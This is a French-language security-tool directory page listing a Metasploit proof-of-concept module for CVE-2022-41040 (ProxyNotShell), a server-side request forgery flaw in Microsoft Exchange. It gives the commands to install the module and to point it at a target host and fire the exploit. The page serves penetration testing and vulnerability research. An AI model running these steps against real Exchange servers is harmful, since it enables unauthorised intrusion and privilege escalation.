Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2022-41040-metasploit-ProxyNotShell — Le script metasploit (POC) concernant CVE-2022-41040. Microsoft Exchange est vulnérable à une attaque de falsification de requête côté serveur (SSRF). Un attaquant authentifié peut utiliser la vulnérabilité pour élever ses privilèges. | Kitploit
Outils/GitHub
GitHub
/taroballzchen
/cve-2022-41040-metasploit-proxynotshell
Escalade de PrivilègesFrameworks d'ExploitationAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'Intrusion
GitHubtaroballzchen/cve-2022-41040-metasploit-proxynotshell

CVE-2022-41040-metasploit-ProxyNotShell

Le script metasploit (POC) concernant CVE-2022-41040. Microsoft Exchange est vulnérable à une attaque de falsification de requête côté serveur (SSRF). Un attaquant authentifié peut utiliser la vulnérabilité pour élever ses privilèges.

Voir le dépôt
3514il y a 3 ansVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2022-41040-metasploit-ProxyNotShell

le script metasploit (POC) concernant CVE-2022-41040. Microsoft Exchange est vulnérable à une attaque de type server-side request forgery (SSRF). Un attaquant authentifié peut utiliser cette vulnérabilité pour élever ses privilèges.

préparation du POC

root@kitploit:~
git clone https://github.com/TaroballzChen/CVE-2022-41040-metasploit-ProxyNotShell
cd CVE-2022-41040-metasploit-ProxyNotShell
mkdir -p ~/.msf4/modules/auxiliary/scanner/http
cp microsoft_exchange_server_proxynotshell_ssrf.py ~/.msf4/modules/auxiliary/scanner/http/
chmod +x ~/.msf4/modules/auxiliary/scanner/http/microsoft_exchange_server_proxynotshell_ssrf.py
msfconsole

utilisation du POC

root@kitploit:~
set rhosts <vuln ip/host>
set rport <vuln port>
set rssl <default: true for https>
exploit

résultat

poc

références

  • https://www.kb.cert.org/vuls/id/915563
  • https://github.com/Vulnmachines/proxynotshell-checker
  • https://github.com/kljunowsky/CVE-2022-41040-POC
  • https://github.com/zan8in/afrog
  • https://github.com/Ph33rr/Exploit
Télécharger l’outil